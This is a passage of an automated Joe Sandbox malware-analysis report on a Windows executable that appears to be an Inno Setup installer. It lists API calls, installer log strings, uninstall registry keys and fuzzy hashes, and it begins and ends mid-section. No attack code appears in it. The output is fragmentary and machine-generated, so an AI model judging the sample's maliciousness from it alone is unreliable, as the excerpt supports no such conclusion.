54215->54902 54218 4241d4 11 API calls 54216->54218 54219 482752 54218->54219 54220 482778 54219->54220 54221 482763 SetActiveWindow 54219->54221 54739 481a78 54220->54739 54221->54220 54270->53968 54271->53953 54272->53953 54273->53953 54274->53978 54283->53981 54295 46c2dc 54284->54295 54287->54025 54289 466442 54288->54289 54290 4078e4 19 API calls 54289->54290 54291 46647d 54290->54291 54291->54032 54292->54023 54293->54021 54294->54014 54296 414ae0 4 API calls 54295->54296 54297 46c310 54296->54297 54356 4666c0 54297->54356 54301 46c322 54302 46c331 54301->54302 54306 46c34a 54301->54306 54391 47e618 42 API calls 54302->54391 54304 403420 4 API calls 54305 46b522 54304->54305 54305->54009 54305->54011 54307 46c391 54306->54307 54308 46c378 54306->54308 54309 46c3f6 54307->54309 54314 46c395 54307->54314 54392 47e618 42 
API calls 54308->54392 54394 42cb44 CharNextA 54309->54394 54312 46c405 54313 46c409 54312->54313 54318 46c422 54312->54318 54395 47e618 42 API calls 54313->54395 54316 46c3dd 54314->54316 54314->54318 54393 47e618 42 API calls 54316->54393 54317 46c446 54396 47e618 42 API calls 54317->54396 54318->54317 54370 466830 54318->54370 54322 46c436 54322->54317 54375 466860 54322->54375 54323 46c345 54323->54304 54326 46c45f 54327 403778 4 API calls 54326->54327 54328 46c475 54327->54328 54379 42c994 54328->54379 54331 46c486 54397 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54331->54397 54332 46c4b7 54334 42c8c4 5 API calls 54332->54334 54336 46c4c2 54334->54336 54335 46c499 54337 45142c 4 API calls 54335->54337 54338 42c3f4 5 API calls 54336->54338 54339 46c4a6 54337->54339 54340 46c4cd 54338->54340 54398 47e618 42 API calls 54339->54398 54342 42cbb8 6 API calls 54340->54342 54343 46c4d8 54342->54343 54383 46c270 54343->54383 54345 46c4e0 54346 42cd40 7 API calls 54345->54346 54347 46c4e8 54346->54347 54348 46c502 54347->54348 54349 46c4ec 54347->54349 54348->54323 54351 46c50c 54348->54351 54399 47e618 42 API calls 54349->54399 54352 46c514 GetDriveTypeA 54351->54352 54352->54323 54353 46c51f 54352->54353 54400 47e618 42 API calls 54353->54400 54359 4666da 54356->54359 54358 42cbb8 6 API calls 54358->54359 54359->54358 54360 403450 4 API calls 54359->54360 54361 406ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54359->54361 54362 466723 54359->54362 54401 42caa4 54359->54401 54360->54359 54361->54359 54363 403420 4 API calls 54362->54363 54364 46673d 54363->54364 54365 414b10 54364->54365 54366 414ae0 4 API calls 54365->54366 54367 414b34 54366->54367 54368 403400 4 API calls 54367->54368 54369 414b65 54368->54369 54369->54301 54373 46683a 54370->54373 54371 46685b 54371->54322 54372 46684d 54372->54322 54373->54371 54373->54372 54412 42cb34 CharNextA 54373->54412 54376 46686a 54375->54376 54377 466897 54376->54377 54413 42cb34 CharNextA 54376->54413 
                                                                  Strings
                                                                  • Time stamp of our file: (failed to read), xrefs: 004707C7
                                                                  • Failed to strip read-only attribute., xrefs: 00470CF3
                                                                  • User opted not to overwrite the existing file. Skipping., xrefs: 00470C6D
                                                                  • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470CB6
                                                                  • Will register the file (a DLL/OCX) later., xrefs: 00471325
                                                                  • p%G, xrefs: 0047151A
                                                                  • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470C0C
                                                                  • InUn, xrefs: 00470F65
                                                                  • Skipping due to "onlyifdoesntexist" flag., xrefs: 004707EE
                                                                  • Stripped read-only attribute., xrefs: 00470CE7
                                                                  • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470AE4
                                                                  • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470D1A
                                                                  • Time stamp of existing file: %s, xrefs: 0047084B
                                                                  • Version of our file: (none), xrefs: 0047091C
                                                                  • Couldn't read time stamp. Skipping., xrefs: 00470B55
                                                                  • Version of our file: %u.%u.%u.%u, xrefs: 00470910
                                                                  • Will register the file (a type library) later., xrefs: 00471319
                                                                  • Version of existing file: %u.%u.%u.%u, xrefs: 0047099C
                                                                  • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470AF0
                                                                  • Installing the file., xrefs: 00470D29
                                                                  • Uninstaller requires administrator: %s, xrefs: 00470F95
                                                                  • Dest file is protected by Windows File Protection., xrefs: 0047070D
                                                                  • Time stamp of our file: %s, xrefs: 004707BB
                                                                  • Incrementing shared file count (32-bit)., xrefs: 004713AB
                                                                  • -- File entry --, xrefs: 0047051B
                                                                  • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470AD5
                                                                  • Incrementing shared file count (64-bit)., xrefs: 00471392
                                                                  • Non-default bitness: 32-bit, xrefs: 004706DB
                                                                  • Dest file exists., xrefs: 004707DB
                                                                  • , xrefs: 004709EF, 00470BC0, 00470C3E
                                                                  • Version of existing file: (none), xrefs: 00470B1A
                                                                  • Existing file has a later time stamp. Skipping., xrefs: 00470BEF
                                                                  • Time stamp of existing file: (failed to read), xrefs: 00470857
                                                                  • @, xrefs: 004705D0
                                                                  • Existing file is a newer version. Skipping., xrefs: 00470A22
                                                                  • Dest filename: %s, xrefs: 004706B4
                                                                  • Same time stamp. Skipping., xrefs: 00470B75
                                                                  • Non-default bitness: 64-bit, xrefs: 004706CF
                                                                  • .tmp, xrefs: 00470DD7
                                                                  • Same version. Skipping., xrefs: 00470B05
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.$p%G
                                                                  • API String ID: 0-1519224904
                                                                  • Opcode ID: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                  • Instruction ID: 29ad728ada19ee594bb20a6f10617e7c4442303fd1b73b354b0c7f106615fe65
                                                                  • Opcode Fuzzy Hash: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                                  • Instruction Fuzzy Hash: 64928534A0528CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392C7789E45CB59

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                                  • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                                  • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                  • String ID: CheckTokenMembership$advapi32.dll
                                                                  • API String ID: 2252812187-1888249752
                                                                  • Opcode ID: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                  • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                                  • Opcode Fuzzy Hash: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                                  • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                  • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                                  • Opcode Fuzzy Hash: 9ffe30bceb486a938f48287b2c3da3d7a5ad61c49b50789ac52c05ed45da257e
                                                                  • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09

                                                                  APIs
                                                                    • Part of subcall function 00494DD8: GetWindowRect.USER32(00000000), ref: 00494DEE
                                                                  • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046759B
                                                                    • Part of subcall function 0041D6A8: GetObjectA.GDI32(?,00000018,004675B5), ref: 0041D6D3
                                                                    • Part of subcall function 00466FA8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                    • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                    • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                    • Part of subcall function 00466968: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                                    • Part of subcall function 0049505C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495066
                                                                    • Part of subcall function 0042ED30: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                    • Part of subcall function 0042ED30: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                    • Part of subcall function 00494D28: 73A1A570.USER32(00000000,?,?,?), ref: 00494D4A
                                                                    • Part of subcall function 00494D28: SelectObject.GDI32(?,00000000), ref: 00494D70
                                                                    • Part of subcall function 00494D28: 73A1A480.USER32(00000000,?,00494DCE,00494DC7,?,00000000,?,?,?), ref: 00494DC1
                                                                    • Part of subcall function 0049504C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495056
                                                                  • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0222FAC0,02231820,?,?,02231850,?,?,022318A0,?), ref: 00468225
                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468236
                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046824E
                                                                    • Part of subcall function 0042A054: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A06A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                  • String ID: $(Default)$STOPIMAGE
                                                                  • API String ID: 3271511185-770201673
                                                                  • Opcode ID: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                  • Instruction ID: b2f63b4b9f8df581d735fd8ef5c85857eef1c350e3dafc85bc3b179d47d789c4
                                                                  • Opcode Fuzzy Hash: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                  • Instruction Fuzzy Hash: FCF2D6387005148FCB00EB69D9D5F9973F1BF49304F1582BAE9049B36ADB74AC46CB9A
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                                  • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: unins$unins???.*
                                                                  • API String ID: 3541575487-1009660736
                                                                  • Opcode ID: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                  • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                                  • Opcode Fuzzy Hash: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                  • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                                  Similarity
                                                                  • API ID: ErrorFileFindFirstLast
                                                                  • String ID:
                                                                  • API String ID: 873889042-0
                                                                  • Opcode ID: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                  • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                                  • Opcode Fuzzy Hash: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                  • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000452,0046DF9A), ref: 0046DF0E
                                                                  • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,00000452,0046DF9A), ref: 0046DF2A
                                                                  Similarity
                                                                  • API ID: CreateInstanceVersion
                                                                  • String ID:
                                                                  • API String ID: 1462612201-0
                                                                  • Opcode ID: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                  • Instruction ID: 830c4b43a8f201c084d489d1d0538b8be171f1220f730b3634288a605713aaeb
                                                                  • Opcode Fuzzy Hash: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                  • Instruction Fuzzy Hash: 08F0A031B853009EEB14E7A9DC46B4A37C0BB65328F4000BBF044972D2E3AC8890875F
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                  • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                                  • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                  • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                                  APIs
                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                                  Similarity
                                                                  • API ID: NtdllProc_Window
                                                                  • String ID:
                                                                  • API String ID: 4255912815-0
                                                                  • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                  • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                  • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                  • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                  • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                                  • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                  • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                                  APIs
                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F534
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: NtdllProc_Window
                                                                  • String ID:
                                                                  • API String ID: 4255912815-0

                                                                  Control-flow Graph

                                                                  [Figure: control-flow graph; first block 46ee78-46eeaa; legend: Executed / Not Executed]
                                                                  APIs
                                                                    • Part of subcall function 0046EC64: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                    • Part of subcall function 0046ECD4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                  • RegCloseKey.ADVAPI32(?,0046F51D,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F568,?,?,0049C1D0,00000000), ref: 0046F510
                                                                  Similarity
                                                                  • API ID: Value$Close
                                                                  • String ID: " /SILENT$5.5.1 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                  • API String ID: 3391052094-213252641

                                                                  Control-flow Graph

                                                                  [Figure: control-flow graph; first block 491d44-491d78; legend: Executed / Not Executed]
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                                  • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                                  Similarity
                                                                  • API ID: FindSleepWindow
                                                                  • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                  • API String ID: 3078808852-3310373309

                                                                  Control-flow Graph

                                                                  [Figure: control-flow graph; first block 483038-48305d; legend: Executed / Not Executed]
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                                  • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                  • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                  • API String ID: 2230631259-2623177817

                                                                  Control-flow Graph

                                                                  [Figure: control-flow graph; first block 450294-4502a1; legend: Executed / Not Executed]
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmStartSession), ref: 004502DD
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmRegisterResources), ref: 004502F2
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmGetList), ref: 00450307
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmShutdown), ref: 0045031C
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmRestart), ref: 00450331
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmEndSession), ref: 00450346
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                  • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                  • API String ID: 1968650500-3419246398

                                                                  Control-flow Graph

                                                                  [Figure: control-flow graph; first block 468bb0-468be8; legend: Executed / Not Executed]
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                                  Strings
                                                                  • Inno Setup: No Icons, xrefs: 00468C9B
                                                                  • Inno Setup: Setup Type, xrefs: 00468CC2
                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                                  • Inno Setup: Icon Group, xrefs: 00468C8E
                                                                  • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                                  • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                                  • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                                  • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                                  • Inno Setup: Selected Components, xrefs: 00468CD2
                                                                  • %s\%s_is1, xrefs: 00468C2D
                                                                  • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                                  • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                                  • Inno Setup: App Path, xrefs: 00468C72
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                  • API String ID: 47109696-1093091907

                                                                  Control-flow Graph

                                                                  [Figure: control-flow graph; first block 42386c-423876; legend: Executed / Not Executed]
                                                                  APIs
                                                                    • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                  • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                                  • RegisterClassA.USER32(00499630), ref: 004238AF
                                                                  • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                                  • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                                  • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                                  • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                                  • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
